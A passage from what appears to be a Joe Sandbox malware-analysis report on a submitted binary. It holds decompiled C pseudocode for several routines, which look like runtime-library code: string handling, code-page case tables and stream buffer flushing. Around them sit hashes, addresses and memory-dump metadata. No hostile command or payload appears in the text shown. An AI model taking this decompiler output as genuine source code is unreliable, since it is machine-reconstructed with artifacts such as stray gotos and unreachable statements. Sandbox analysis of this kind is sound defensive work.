                                                                                • Part of subcall function 0042E6DD: CoFreeUnusedLibraries.OLE32(00000000,0042E7BD,00000000,?,?,0040DD8B), ref: 0042E721
                                                                                • Part of subcall function 0042E6DD: OleUninitialize.OLE32(?,?,0040DD8B), ref: 0042E727
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                              • String ID:
                                                                              • API String ID: 685759847-0
                                                                              • Opcode ID: 96d8073151e37bb7f3ef1cb4b8579b07bf6f63f66bc497836e4d46781c35c349
                                                                              • Instruction ID: 95448ae544d37ef92624e5e8fb17c3d7ac4347ff59c154f277d32de88923503c
                                                                              • Opcode Fuzzy Hash: 96d8073151e37bb7f3ef1cb4b8579b07bf6f63f66bc497836e4d46781c35c349
                                                                              • Instruction Fuzzy Hash: 63E09A31D09320DBD760AF61FE4821E3BE0AB95716F800877E640822B1C7788C81DF4E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00415C6C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E00415C6C(void* __ebx, void* __ecx, void* __edi, signed int __esi) {
				void* __ebp;
				intOrPtr _t72;
				intOrPtr _t89;
				signed int _t95;
				intOrPtr _t103;
				intOrPtr* _t104;
				signed int _t105;
				signed int _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				intOrPtr* _t113;
				signed int _t116;
				intOrPtr _t127;
				signed int* _t135;
				signed int _t137;
				void* _t138;
				void* _t140;

				_t137 = __esi;
				_t138 = _t140 - 0x74;
				_t72 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t138 + 0x70)) = _t72;
				_push(__esi);
				if(E00415B10(__ebx, __edi, __esi,  *((intOrPtr*)(_t138 + 0x7c)), _t138 - 0x14, _t138 - 0x138, _t138 - 0x11c) == 0) {
					L29:
					return E00412FBB(_t76,  *((intOrPtr*)(_t138 + 0x70)));
				}
				_push(__ebx);
				_t116 = __esi + __esi * 2 << 2;
				if(E00416EE0(_t138 - 0x14,  *(_t116 + 0x4576cc)) != 0) {
					_t76 = E00412247(E00411A30(_t138 - 0x14) + 1);
					__eflags = _t76;
					 *(_t138 - 0x124) = _t76;
					if(_t76 == 0) {
						L28:
						goto L29;
					}
					_push(__edi);
					 *(_t138 - 0x120) =  *(_t116 + 0x4576cc);
					_t135 = 0x45a728 + __esi * 4;
					 *(_t138 - 0x13c) =  *_t135;
					 *(_t138 - 0x118) = 0x45a864 + (__esi + __esi * 2) * 2;
					E00411AC0(_t138 - 0x14c, 0x45a864 + (__esi + __esi * 2) * 2, 6);
					_t89 =  *0x45a740; // 0x0
					 *((intOrPtr*)(_t138 - 0x128)) = _t89;
					 *(_t116 + 0x4576cc) = E00419460( *(_t138 - 0x124), _t138 - 0x14);
					 *_t135 =  *(_t138 - 0x138) & 0x0000ffff;
					E00411AC0( *(_t138 - 0x118), _t138 - 0x138, 6);
					__eflags = __esi - 2;
					if(__esi != 2) {
						L20:
						__eflags = _t137 - 1;
						if(_t137 == 1) {
							 *0x45a744 =  *((intOrPtr*)(_t138 - 0x11c));
						}
						_t95 =  *((intOrPtr*)(_t116 + 0x4576d0))();
						__eflags = _t95;
						if(_t95 == 0) {
							__eflags =  *(_t138 - 0x120) - 0x457530;
							if( *(_t138 - 0x120) != 0x457530) {
								_push( *(_t138 - 0x120));
								E00412A4D();
							}
							_t76 =  *(_t116 + 0x4576cc);
						} else {
							_push( *(_t138 - 0x124));
							 *(_t116 + 0x4576cc) =  *(_t138 - 0x120);
							E00412A4D();
							 *_t135 =  *(_t138 - 0x13c);
							 *0x45a740 =  *((intOrPtr*)(_t138 - 0x128));
							_t76 = 0;
						}
						goto L28;
					}
					_t126 =  *0x4575b0; // 0x0
					_t33 = _t138 - 0x118;
					 *_t33 =  *(_t138 - 0x118) & 0x00000000;
					__eflags =  *_t33;
					 *0x45a740 =  *((intOrPtr*)(_t138 - 0x11c));
					_t103 =  *0x4575b4; // 0x0
					 *((intOrPtr*)(_t138 - 0x12c)) = _t103;
					_t104 = 0x457590;
					while(1) {
						__eflags =  *((intOrPtr*)(_t138 - 0x11c)) -  *_t104;
						if( *((intOrPtr*)(_t138 - 0x11c)) ==  *_t104) {
							break;
						}
						 *(_t138 - 0x118) =  *(_t138 - 0x118) + 1;
						 *_t104 = _t126;
						 *((intOrPtr*)(_t138 - 0x144)) =  *_t104;
						_t41 = _t104 + 4; // 0x1
						 *((intOrPtr*)(_t104 + 4)) =  *((intOrPtr*)(_t138 - 0x12c));
						_t126 =  *((intOrPtr*)(_t138 - 0x144));
						_t104 = _t104 + 8;
						__eflags = _t104 - 0x4575b8;
						 *((intOrPtr*)(_t138 - 0x12c)) =  *_t41;
						if(_t104 < 0x4575b8) {
							continue;
						}
						L11:
						__eflags =  *(_t138 - 0x118) - 5;
						if(__eflags != 0) {
							_t106 =  *0x457594; // 0x1
							L19:
							 *0x457870 = _t106;
							goto L20;
						}
						_push(1);
						_push( *0x45a730);
						_push( *((intOrPtr*)(_t138 - 0x11c)));
						_push(_t138 - 0x114);
						_push(0x7f);
						_push(0x44be38);
						_push(1);
						_t108 = E00419914(_t116, _t126, _t135, _t137, __eflags);
						__eflags = _t108;
						if(_t108 == 0) {
							_t106 = 0;
							__eflags = 0;
							L17:
							_t127 =  *0x45a740; // 0x0
							 *0x457594 = _t106;
							 *0x457590 = _t127;
							goto L19;
						}
						_t109 = 0;
						__eflags = 0;
						do {
							 *(_t138 + _t109 * 2 - 0x113) =  *(_t138 + _t109 * 2 - 0x113) & 0x00000001;
							_t109 = _t109 + 1;
							__eflags = _t109 - 0x7f;
						} while (_t109 < 0x7f);
						_t111 = E004131F0(_t138 - 0x114, 0x44bd38, 0xfe);
						asm("sbb eax, eax");
						_t106 =  ~_t111 + 1;
						goto L17;
					}
					_t105 =  *(_t138 - 0x118);
					__eflags = _t105;
					if(_t105 != 0) {
						_t113 = 0x457590 + _t105 * 8;
						 *0x457590 =  *_t113;
						 *0x457594 =  *((intOrPtr*)(_t113 + 4));
						 *_t113 = _t126;
						_t126 =  *((intOrPtr*)(_t138 - 0x12c));
						 *((intOrPtr*)(_t113 + 4)) =  *((intOrPtr*)(_t138 - 0x12c));
					}
					goto L11;
				}
				_t76 =  *(_t116 + 0x4576cc);
				goto L28;
			}





















                                                                              0x00415c6c
                                                                              0x00415c6d
                                                                              0x00415c77
                                                                              0x00415c7c
                                                                              0x00415c7f
                                                                              0x00415c9f
                                                                              0x00415eee
                                                                              0x00415efa
                                                                              0x00415efa
                                                                              0x00415ca5
                                                                              0x00415ca9
                                                                              0x00415cbf
                                                                              0x00415cd7
                                                                              0x00415cdc
                                                                              0x00415ce0
                                                                              0x00415ce6
                                                                              0x00415eed
                                                                              0x00000000
                                                                              0x00415eed
                                                                              0x00415cf2
                                                                              0x00415cf3
                                                                              0x00415cf9
                                                                              0x00415d02
                                                                              0x00415d15
                                                                              0x00415d22
                                                                              0x00415d27
                                                                              0x00415d2c
                                                                              0x00415d41
                                                                              0x00415d4e
                                                                              0x00415d5f
                                                                              0x00415d67
                                                                              0x00415d6a
                                                                              0x00415e85
                                                                              0x00415e85
                                                                              0x00415e88
                                                                              0x00415e90
                                                                              0x00415e90
                                                                              0x00415e95
                                                                              0x00415e9b
                                                                              0x00415e9d
                                                                              0x00415ece
                                                                              0x00415ed8
                                                                              0x00415eda
                                                                              0x00415ee0
                                                                              0x00415ee5
                                                                              0x00415ee6
                                                                              0x00415e9f
                                                                              0x00415ea5
                                                                              0x00415eab
                                                                              0x00415eb1
                                                                              0x00415ebc
                                                                              0x00415ec4
                                                                              0x00415eca
                                                                              0x00415eca
                                                                              0x00000000
                                                                              0x00415eec
                                                                              0x00415d76
                                                                              0x00415d7c
                                                                              0x00415d7c
                                                                              0x00415d7c
                                                                              0x00415d83
                                                                              0x00415d88
                                                                              0x00415d8d
                                                                              0x00415d93
                                                                              0x00415d98
                                                                              0x00415d9e
                                                                              0x00415da0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415da4
                                                                              0x00415daa
                                                                              0x00415db2
                                                                              0x00415db8
                                                                              0x00415dbb
                                                                              0x00415dbe
                                                                              0x00415dc4
                                                                              0x00415dc7
                                                                              0x00415dcc
                                                                              0x00415dd2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415e03
                                                                              0x00415e03
                                                                              0x00415e0a
                                                                              0x00415e7b
                                                                              0x00415e80
                                                                              0x00415e80
                                                                              0x00000000
                                                                              0x00415e80
                                                                              0x00415e0c
                                                                              0x00415e0e
                                                                              0x00415e1a
                                                                              0x00415e20
                                                                              0x00415e21
                                                                              0x00415e23
                                                                              0x00415e28
                                                                              0x00415e2a
                                                                              0x00415e32
                                                                              0x00415e34
                                                                              0x00415e66
                                                                              0x00415e66
                                                                              0x00415e68
                                                                              0x00415e68
                                                                              0x00415e6e
                                                                              0x00415e73
                                                                              0x00000000
                                                                              0x00415e73
                                                                              0x00415e36
                                                                              0x00415e36
                                                                              0x00415e38
                                                                              0x00415e38
                                                                              0x00415e40
                                                                              0x00415e41
                                                                              0x00415e41
                                                                              0x00415e57
                                                                              0x00415e61
                                                                              0x00415e63
                                                                              0x00000000
                                                                              0x00415e63
                                                                              0x00415dd6
                                                                              0x00415ddc
                                                                              0x00415dde
                                                                              0x00415de0
                                                                              0x00415de9
                                                                              0x00415df2
                                                                              0x00415df8
                                                                              0x00415dfa
                                                                              0x00415e00
                                                                              0x00415e00
                                                                              0x00000000
                                                                              0x00415dde
                                                                              0x00415cc1
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcat_strlen
                                                                              • String ID: 0uE
                                                                              • API String ID: 432593777-2413036590
                                                                              • Opcode ID: 5a76f18916adc4f3bd8b7883d2e193f96d551a90fbd8f1e348faac662e0287b8
                                                                              • Instruction ID: 47e724a208c613d35e2dce768da74c778b1b737601ef56c47e278f2d06f61657
                                                                              • Opcode Fuzzy Hash: 5a76f18916adc4f3bd8b7883d2e193f96d551a90fbd8f1e348faac662e0287b8
                                                                              • Instruction Fuzzy Hash: 45712971904319DFDB24DF24ED81ADAB7F8EB48301F1045AAE909D7262E734DA91CF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041354C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 65%
                                                                              			E0041354C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x457184; // 0xc72e1596
				_v8 = _t42;
				if(GetCPInfo( *0x45bd64,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x45bd80) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x45bc61) =  *(_t45 + 0x45bc61) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x45bc61) =  *(_t45 + 0x45bc61) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x45bd80) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x45bc4c);
					_push( *0x45bd64);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E00419914(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x45bd64);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x45bc4c);
					E00419558(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x45bd64);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x45bc4c);
					E00419558(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x45bd80)) = 0;
							} else {
								 *(_t58 + 0x45bc61) =  *(_t58 + 0x45bc61) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x45bc61) =  *(_t58 + 0x45bc61) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x45bd80)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E00412FBB(_t45, _v8);
			}





























                                                                              0x0041354c
                                                                              0x0041354c
                                                                              0x00413555
                                                                              0x0041355a
                                                                              0x00413576
                                                                              0x00413689
                                                                              0x00413689
                                                                              0x0041368b
                                                                              0x0041368b
                                                                              0x0041368e
                                                                              0x004136a9
                                                                              0x004136a9
                                                                              0x004136ac
                                                                              0x004136c1
                                                                              0x004136c1
                                                                              0x004136ae
                                                                              0x004136ae
                                                                              0x004136b1
                                                                              0x00000000
                                                                              0x004136b3
                                                                              0x004136b3
                                                                              0x004136bc
                                                                              0x00000000
                                                                              0x004136bc
                                                                              0x004136b1
                                                                              0x00413690
                                                                              0x00413690
                                                                              0x00413693
                                                                              0x00000000
                                                                              0x00413695
                                                                              0x00413695
                                                                              0x0041369e
                                                                              0x0041369e
                                                                              0x004136a1
                                                                              0x004136a1
                                                                              0x004136a1
                                                                              0x00413693
                                                                              0x004136c8
                                                                              0x004136c9
                                                                              0x004136c9
                                                                              0x0041357c
                                                                              0x0041357c
                                                                              0x0041357e
                                                                              0x0041357e
                                                                              0x00413585
                                                                              0x00413586
                                                                              0x0041358a
                                                                              0x0041358f
                                                                              0x00413596
                                                                              0x00413598
                                                                              0x00413599
                                                                              0x0041359c
                                                                              0x0041359d
                                                                              0x0041359d
                                                                              0x004135a0
                                                                              0x004135a5
                                                                              0x004135a9
                                                                              0x004135ac
                                                                              0x004135af
                                                                              0x004135c2
                                                                              0x004135c2
                                                                              0x004135c2
                                                                              0x004135c2
                                                                              0x004135c4
                                                                              0x004135c5
                                                                              0x004135c7
                                                                              0x004135c8
                                                                              0x004135c8
                                                                              0x004135cc
                                                                              0x004135cd
                                                                              0x004135cd
                                                                              0x004135ce
                                                                              0x004135d0
                                                                              0x004135dc
                                                                              0x004135e2
                                                                              0x004135e3
                                                                              0x004135ea
                                                                              0x004135eb
                                                                              0x004135ed
                                                                              0x004135f2
                                                                              0x004135f4
                                                                              0x00413600
                                                                              0x00413601
                                                                              0x00413602
                                                                              0x00413609
                                                                              0x0041360a
                                                                              0x0041360b
                                                                              0x00413611
                                                                              0x00413616
                                                                              0x00413618
                                                                              0x00413624
                                                                              0x00413625
                                                                              0x00413626
                                                                              0x0041362d
                                                                              0x0041362e
                                                                              0x00413633
                                                                              0x00413639
                                                                              0x00413641
                                                                              0x00413643
                                                                              0x00413643
                                                                              0x0041364e
                                                                              0x00413666
                                                                              0x00413669
                                                                              0x0041367b
                                                                              0x0041366b
                                                                              0x0041366b
                                                                              0x00413672
                                                                              0x00000000
                                                                              0x00413672
                                                                              0x00413650
                                                                              0x00413650
                                                                              0x00413657
                                                                              0x0041365e
                                                                              0x0041365e
                                                                              0x0041365e
                                                                              0x00413682
                                                                              0x00413683
                                                                              0x00413687
                                                                              0x004136d7

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $
                                                                              • API String ID: 1807457897-3032137957
                                                                              • Opcode ID: 99aa7142370eae45eb59a97ffc4110fe66870ff66ab62381b5d1e9af5e93636a
                                                                              • Instruction ID: a1e0cf95d1cb9a8f66a2547962cf775c676343c899b257a01c873b7714aafa0f
                                                                              • Opcode Fuzzy Hash: 99aa7142370eae45eb59a97ffc4110fe66870ff66ab62381b5d1e9af5e93636a
                                                                              • Instruction Fuzzy Hash: 6D41F2301003586EEB228F18DC59BFA7BA9DB05706F2404EAE545D7263CB684B95DBDC
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401D2E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E00401D2E(void* __eflags) {
				void* _t51;
				intOrPtr _t54;
				signed int _t83;
				void* _t97;
				intOrPtr* _t100;
				void* _t102;
				void* _t104;

				E004128A0(E00430411, _t102);
				 *((intOrPtr*)(_t102 - 0x10)) = _t104 - 0x14;
				_t83 = 0;
				 *(_t102 - 0x14) = 0;
				_t51 = E00411A30( *((intOrPtr*)(_t102 + 0xc)));
				_t100 =  *((intOrPtr*)(_t102 + 8));
				_t97 = _t51;
				_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x18));
				if(_t54 > 0 && _t54 > _t97) {
					_t83 = _t54 - _t97;
				}
				_push(_t100);
				E00401A1E(_t102 - 0x20);
				 *(_t102 - 4) =  *(_t102 - 4) & 0x00000000;
				if( *((char*)(_t102 - 0x1c)) != 0) {
					 *(_t102 - 4) = 1;
					if(( *( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x10) & 0x000001c0) == 0x40) {
						L10:
						_push(_t97);
						_push( *((intOrPtr*)(_t102 + 0xc)));
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x28)))) + 0x1c))() == _t97) {
							while(_t83 > 0) {
								 *((char*)(_t102 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x30));
								if(E00401939( *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x28)),  *((intOrPtr*)(_t102 - 0x18))) != 0xffffffff) {
									_t83 = _t83 - 1;
									continue;
								} else {
									 *(_t102 - 0x14) =  *(_t102 - 0x14) | 0x00000004;
									goto L12;
								}
								L19:
							}
						} else {
							 *(_t102 - 0x14) = 4;
						}
					} else {
						while(_t83 > 0) {
							 *((char*)(_t102 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x30));
							if(E00401939( *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x28)),  *((intOrPtr*)(_t102 - 0x18))) != 0xffffffff) {
								_t83 = _t83 - 1;
								continue;
							} else {
								 *(_t102 - 0x14) =  *(_t102 - 0x14) | 0x00000004;
							}
							break;
						}
						if( *(_t102 - 0x14) == 0) {
							goto L10;
						}
					}
					L12:
					 *( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x18) =  *( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x18) & 0x00000000;
				} else {
					 *(_t102 - 0x14) = 4;
				}
				 *(_t102 - 4) =  *(_t102 - 4) & 0x00000000;
				E0040191E( *((intOrPtr*)( *_t100 + 4)) + _t100,  *(_t102 - 0x14), 0);
				 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
				E00401C87(_t102 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t102 - 0xc));
				return _t100;
				goto L19;
			}










                                                                              0x00401d33
                                                                              0x00401d3e
                                                                              0x00401d44
                                                                              0x00401d46
                                                                              0x00401d49
                                                                              0x00401d4e
                                                                              0x00401d51
                                                                              0x00401d58
                                                                              0x00401d5f
                                                                              0x00401d67
                                                                              0x00401d67
                                                                              0x00401d69
                                                                              0x00401d6d
                                                                              0x00401d72
                                                                              0x00401d7a
                                                                              0x00401d99
                                                                              0x00401d9d
                                                                              0x00401dcc
                                                                              0x00401dd7
                                                                              0x00401dd8
                                                                              0x00401de0
                                                                              0x00401df9
                                                                              0x00401e0a
                                                                              0x00401e1a
                                                                              0x00401e22
                                                                              0x00000000
                                                                              0x00401e1c
                                                                              0x00401e1c
                                                                              0x00000000
                                                                              0x00401e1c
                                                                              0x00000000
                                                                              0x00401e1a
                                                                              0x00401de2
                                                                              0x00401de2
                                                                              0x00401de2
                                                                              0x00401d9f
                                                                              0x00401d9f
                                                                              0x00401db0
                                                                              0x00401dc0
                                                                              0x00401df6
                                                                              0x00000000
                                                                              0x00401dc2
                                                                              0x00401dc2
                                                                              0x00401dc2
                                                                              0x00000000
                                                                              0x00401dc0
                                                                              0x00401dca
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00401dca
                                                                              0x00401de9
                                                                              0x00401df0
                                                                              0x00401d7c
                                                                              0x00401d7c
                                                                              0x00401d7c
                                                                              0x00401e4b
                                                                              0x00401e56
                                                                              0x00401e5b
                                                                              0x00401e62
                                                                              0x00401e6e
                                                                              0x00401e77
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog_strlen
                                                                              • String ID: ,D
                                                                              • API String ID: 3871006878-2732034087
                                                                              • Opcode ID: 4fef6bd09adf085d1fcd714fd990fa812df3eeede1ba5c4f6a660a67405dfdce
                                                                              • Instruction ID: c515110007080e5e4696b1ce805c37cc91c6fc4dd46f766397bb9d3daa8a8093
                                                                              • Opcode Fuzzy Hash: 4fef6bd09adf085d1fcd714fd990fa812df3eeede1ba5c4f6a660a67405dfdce
                                                                              • Instruction Fuzzy Hash: 6D415E34601205CFDB14CF99C995BAEBBF4AF18328F24456AE551A73B2C378EE40CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417B7F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E00417B7F(void* __edx, signed int _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				signed int _t51;
				signed short _t55;
				signed int _t59;
				void* _t60;
				signed int _t69;
				void* _t80;
				signed int _t83;
				signed int* _t86;

				_t80 = __edx;
				_t86 = _a8;
				_t50 = _t86[3];
				_t69 = _t86[4];
				if((_t50 & 0x00000082) == 0 || (_t50 & 0x00000040) != 0) {
					L24:
					_t51 = _t50 | 0x00000020;
					__eflags = _t51;
					_t86[3] = _t51;
					goto L25;
				} else {
					if((_t50 & 0x00000001) == 0) {
						L5:
						_t86[1] = _t86[1] & 0x00000000;
						_a8 = _a8 & 0x00000000;
						_t55 = _t86[3] & 0xffffffef | 0x00000002;
						_t86[3] = _t55;
						if((_t55 & 0x0000010c) != 0) {
							L10:
							if((_t86[3] & 0x00000108) == 0) {
								_t83 = 1;
								__eflags = 1;
								_push(1);
								_push( &_a4);
								_push(_t69);
								_t51 = E0041CB1F(_t69, _t80, 1, _t86, 1);
								_a8 = _t51;
								L21:
								if(_a8 == _t83) {
									return _a4 & 0x000000ff;
								}
								_t86[3] = _t86[3] | 0x00000020;
								L25:
								return _t51 | 0xffffffff;
							}
							_t59 = _t86[2];
							 *_t86 = _t59 + 1;
							_t83 =  *_t86 - _t59;
							_t100 = _t83;
							_t86[1] = _t86[6] - 1;
							if(_t83 <= 0) {
								__eflags = _t69 - 0xffffffff;
								if(_t69 == 0xffffffff) {
									_t60 = 0x457840;
								} else {
									_t60 =  *((intOrPtr*)(0x45bb20 + (_t69 >> 5) * 4)) + ((_t69 & 0x0000001f) + (_t69 & 0x0000001f) * 8) * 4;
								}
								__eflags =  *(_t60 + 4) & 0x00000020;
								if(__eflags == 0) {
									L19:
									_t51 = _t86[2];
									 *_t51 = _a4;
									goto L21;
								} else {
									_push(2);
									_push(0);
									_push(_t69);
									E0041C8A6(_t69, _t83, _t86, __eflags);
									L18:
									goto L19;
								}
							}
							_push(_t83);
							_push(_t59);
							_push(_t69);
							_a8 = E0041CB1F(_t69, _t80, _t83, _t86, _t100);
							goto L18;
						}
						if(_t86 == 0x457ae8 || _t86 == 0x457b08) {
							if(E0041CC0E(_t69) != 0) {
								goto L10;
							}
							goto L9;
						} else {
							L9:
							E0041CBCA(_t86);
							goto L10;
						}
					}
					_t86[1] = _t86[1] & 0x00000000;
					if((_t50 & 0x00000010) == 0) {
						goto L24;
					}
					 *_t86 = _t86[2];
					_t86[3] = _t50 & 0xfffffffe;
					goto L5;
				}
			}
















                                                                              0x00417b7f
                                                                              0x00417b84
                                                                              0x00417b87
                                                                              0x00417b8c
                                                                              0x00417b8f
                                                                              0x00417c8b
                                                                              0x00417c8b
                                                                              0x00417c8b
                                                                              0x00417c8e
                                                                              0x00000000
                                                                              0x00417b9d
                                                                              0x00417b9f
                                                                              0x00417bb8
                                                                              0x00417bbb
                                                                              0x00417bbf
                                                                              0x00417bc6
                                                                              0x00417bcd
                                                                              0x00417bd0
                                                                              0x00417bf4
                                                                              0x00417bfb
                                                                              0x00417c63
                                                                              0x00417c63
                                                                              0x00417c64
                                                                              0x00417c68
                                                                              0x00417c69
                                                                              0x00417c6a
                                                                              0x00417c72
                                                                              0x00417c75
                                                                              0x00417c79
                                                                              0x00000000
                                                                              0x00417c84
                                                                              0x00417c7b
                                                                              0x00417c91
                                                                              0x00000000
                                                                              0x00417c91
                                                                              0x00417bfd
                                                                              0x00417c05
                                                                              0x00417c0a
